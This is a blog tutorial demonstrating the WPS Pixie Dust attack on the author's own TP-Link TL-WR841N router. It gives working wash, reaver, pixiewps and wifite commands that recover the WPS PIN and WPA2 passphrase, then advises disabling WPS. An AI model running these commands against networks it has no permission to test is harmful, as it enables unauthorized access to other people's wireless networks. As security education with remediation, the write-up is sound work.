> Beniamin Jablonski, 2025-01-03 > [!attention] > This article has an educational purpose only. # INTRODUCTION Some time ago, I purchased a budget router, the `TL-WR841N` from `TP-Link`, to develop my hardware hacking skills as part of the [PIPA](https://certifications.tcm-sec.com/pipa/) course offered by TCM Security. Around the same time, I was working on documentation summarizing existing and well-known attacks against wireless networks. Since I had the router on my desk, I decided to try the **Pixie Dust** attack against **WPS**. I was convinced that this attack, developed over a decade ago, would fail against a newly purchased router straight out of the box. My initial goal was simply to document the commands required for the attack and even the output indicating that the attack would be impossible. To my surprise, the attack succeeded, and within seconds, I had the password in plaintext, allowing me to connect to the wireless network. This unexpected result got me curious and made me want to dig deeper into how this attack actually works. # THEORY The **Pixie Dust** attack, discovered by Dominique Bongard in 2014, can be performed against access points offering the **Wi-Fi Protected Setup** (**WPS**) feature. WPS is an old (created in 2006) network security standard designed to make it easier for users to connect devices to a wireless network without the need for manually entering long and complex passphrases. It offers various methods to establish connections, such as Push-Button Configuration (PBC) or PIN entry. The Pixie Dust attack targets WPS, which uses an **8-digit PIN** for authentication. It exploits a weakness in the implementation of WPS in certain chipsets where the **random value generation** is flawed and vulnerable to reversal. The PIN-based connection relies on the exchange of **8 messages** ($M_1–M_8$) between the access point and the client device. Even without knowing the correct PIN, it is possible to establish partial communication with the access point and exchange the first **4 messages**, after which the access point terminates the process. network. These 4 messages contain parameters that, if intercepted by an attacker, can be used to conduct an offline brute-force attack on the PIN. The root cause of this vulnerability is the lack of sufficient randomization in the access point's generation of the so-called `E-S1` and `E-S2` nonces. In cases of vulnerable WPS implementations, the 8-digit PIN can be cracked in minutes (or even milliseconds, as we will show), granting the attacker access to the wireless network. > [!note] > If you want to know more about the theoretical background of WPS authentication, check the article: [[WPS Pixie Dust Attack (2) - Understanding the WPS Registration Protocol]]. # ATTACK ## Note The `TL-WR841N` router I used was delivered with the following firmware: ``` Firmware: 0.9.1 4.18 v0268.0 Build 210203 Rel.43315n TL-WR841N v14 00000014 ``` When I updated the firmware to the latest version, the Pixie Dust Attack failed: ``` Firmware: 0.9.1 4.19 v0268.0 Build 231120 Rel.6461n TL-WR841N v14 00000014 ``` ## Attack Requirements We need a network card supporting the **monitor mode** to carry out the Pixie Dust attack. I used the `ALFA AWUS036ACM` network card. Additionally, the target of the attack must meet the following requirements: - The access point must have the **WPS feature enabled**. - WPS must **not be locked**. - The access point must use a **vulnerable random PIN generation mechanism**. A list of vulnerable routers can be found in the [Wireless Security Database](https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?gid=2048815923#gid=2048815923). Interestingly, we can also see the `TL-WR841N` router (but there is no comment about the Pixie Dust). ![[Pasted image 20250102112504.png]] ## Tools We will use the following tools: - [reaver and wash](https://github.com/t6x/reaver-wps-fork-t6x) - [wifite2](https://github.com/derv82/wifite2) ## Option A: wash and reaver First, we use the `wash` tool to detect devices offering WPS in the nearby area. We have to note the `BSSID` and `channel` of the target: ```bash sudo wash -i wlan0 # -i <wireless card name utilising monitor mode> ``` ![[Pasted image 20241231151021.png]] > [!note] > To perform an attack, the **LCK** value must be set to **No**. Then, we use the `reaver tool` to perform the attack: ```bash sudo reaver -i wlan0 -b F0:A7:31:D7:A6:0E -c 10 -v -K # -i <wireless card name utilising monitor mode> # -b <target BSSID> # -c <target channeg> # -v - verbose output # -K - perform Pixie Dust attack ``` ![[Pasted image 20241231151241.png]] The attack was successful. Let's summarise the steps the `reaver` has done to understand the attack flow: - The `reaver` attempted to authenticate with a `12345678` PIN, which is, of course, invalid. It obtained the parameters required to perform offline brute forcing. As we can see, the `reaver` tool used the [pixiewps](https://github.com/wiire-a/pixiewps?tab=readme-ov-file) tool under the hood (1) for offline brute-forcing. - After 76 milliseconds, the brute-forcing procedure finished, and the WPS PIN was found: `01576672` (2). - The `reaver` connected to the access point again, and using the valid PIN, it obtained the valid WPA2 passphrase that allows for connecting to the wireless network using classical and most often used WPA2 protocol. The `pixiewps` is also an independent, offline tool. We can confirm that it works appropriately by invoking the following command, that was displayed in the `reaver` output: ```bash pixiewps -e 4a9e178813788a580fff029a411b68301d6fe26d1b0935be7f35a803018e5a64771b3fac4e7c0e2fb40454cf2052e5a152c235fde4924c0b5d60bf8ab5f15bdcd3b08e0a94313e71a49ac065495f7964296a0e8a0fd1cfe684e59f6c7fb63a2e6d57d1db86c45d903b5a95be9d6eeac5692117ccd1d35f4018a24b2a3e15ad0ee23a60843e264379337f47b77b7617a3933779e305ceece540bd172adc01daf9c1d514103bcaf69588f0bf33161d96be02f20a1717019ca6f33dcf4dc26eeaf3 -s 432f764968ca6b7a1a50db85b56fa4089ca8b411e85cfa702e27b61ba636436a -z d7a94bc7b051164c6e8524572172e8b552f5b0b19345246a15829cf29405102a -a 96b8eecca04c73f36fd51880be4bad411503be20d8ec39b20b864db215dfc140 -n ed90c1896a2253e36a860b987a6acf32 -r 9e9f0dfb1d36d9cfff4625bb2896d261dc6e2c4a1c902864f58c4f61ef2f09340f7a32e22f8ae6e065dde3ee1ea746b657d3d5dcf545068e3abb8ad992a9847c61840ba6e86e386e94a760705e81a845aa03f8ec2065e71c4c8862d28d5c993f4c6bc956e1a6dfa6513b6d8d9de45a59be987358d9577412189b61e577870b6f8677a516557850717ab3cafc1882f81f5a46c961227734f27d779963290a15879e4c1b26517b5bd439c471a15ed37b288868c81ac89a9b114cbfd91c14889f21 # -e <Enrollee public key PKE> # -s <Enrollee hash 1 E-Hash1> # -z <Enrollee hash 2 E-Hash2> # -a <authkey> # -n <Enrollee nonce N1> # -r <Registrar public key PKR> ``` ![[Pasted image 20241231151328.png]] > [!note] > For more details about `pixiewps` and options used with the command: [[WPS Pixie Dust Attack (2) - Understanding the WPS Registration Protocol]]. ## Option B: wifite We can speed up the attack by using a tool called [wifite2](https://github.com/derv82/wifite2). If we want to perform only the Pixie Dust attack on a network with a specific SSID, we can use the following command: ```bash sudo wifi --wps-only --pixie -e TP-Link_A60F # --wps-only - perform attack only against WPS # --pixie - perform Pixie Dust attack # -e <SSID> ``` If the network is vulnerable, we will quickly receive the result presented in a convenient format. ![[Pasted image 20241231151527.png]] # REMEDIATIONS Remediation in this case is simple: **disable the WPS feature**. While a firmware update can remove this vulnerability, considering the outdated nature of WPS and the potentially severe consequences of its exploitation, it's best to avoid using it altogether. There are other, more secure methods for connecting devices to wireless networks. # REFERENCES 1. **Wi-Fi Protected Setup Specification Version 2.0.9**, Wi-Fi Alliance, 2024, [Link](https://www.wi-fi.org/discover-wi-fi/wi-fi-protected-setup) 2. [pixiewps](https://github.com/wiire-a/pixiewps) 3. [wifite2](https://github.com/derv82/wifite2) 4. [reaver](https://github.com/t6x/reaver-wps-fork-t6x/tree/master) 5. [pixiewps wiki FAQ](https://github.com/wiire-a/pixiewps/wiki/FAQ) 6. [Wireless Security Database](https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?gid=2048815923#gid=2048815923) 7. [TL-WR841N V14 User Guide](https://www.tp-link.com/us/user-guides/tl-wr841n_v14/conventions) 8. [TL-WR841N V14 Firmware](https://www.tp-link.com/pl/support/download/tl-wr841n/#Firmware)